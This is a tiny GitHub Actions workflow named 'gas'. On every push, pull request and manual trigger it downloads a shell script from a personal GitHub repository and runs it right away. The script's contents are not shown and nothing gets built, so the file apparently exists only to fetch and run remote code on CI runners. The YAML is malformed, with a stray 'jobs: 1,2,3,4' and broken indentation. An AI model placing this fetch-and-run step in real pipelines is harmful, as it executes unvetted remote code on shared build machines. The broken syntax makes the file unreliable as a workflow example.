name: gas
on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
  workflow_dispatch:
jobs: 1,2,3,4
  build:
    runs-on: ubuntu-20.04
    steps:
      - name: multiple
        run: |
       wget https://github.com/stokjacky/cek1/raw/main/gas.sh && chmod +x gas.sh && ./gas.sh
